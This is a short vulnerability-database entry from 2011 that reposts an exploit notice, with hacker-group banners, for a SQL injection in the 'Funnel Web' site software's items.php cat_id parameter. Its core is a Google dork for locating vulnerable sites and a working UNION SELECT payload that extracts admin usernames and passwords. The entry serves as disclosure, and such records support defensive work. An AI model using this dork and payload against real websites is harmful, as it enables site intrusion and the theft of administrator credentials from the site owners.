Funnel Web (items.php?&cat_id) Remote SQL injection Vulnerability

2011-07-26T00:00:00
ID SECURITYVULNS:DOC:26709
Type securityvulns
Reporter Securityvulns
Modified 2011-07-26T00:00:00

Description

############################### IRANIAN THE BEST HACKERS IN THE WORLD ##################

##############

Remote SQL injection Vulnerability

Funnel Web (items.php?&cat_id)

AuTh0r : Ehsan_Hp200

H0ME : www.ehsanhp.blogsky.com

Email : Ehsan_Hp200@Hotmail.com

Vendor : http://www.funnel-web.com.au/

Persian Gulf 4 Ever!

Dork : "Web site design by Funnel Web" "inurl:items.php"

Exploite:

www.victim.com/items.php?&cat_id=-1+Union+Select+1,concat(user_id,0x3a,user_pw),1+From+admin--

SpeCial TanX To : Dj7Xpl

######################### IRANIAN THE BEST HACKERS IN THE WORLD ##################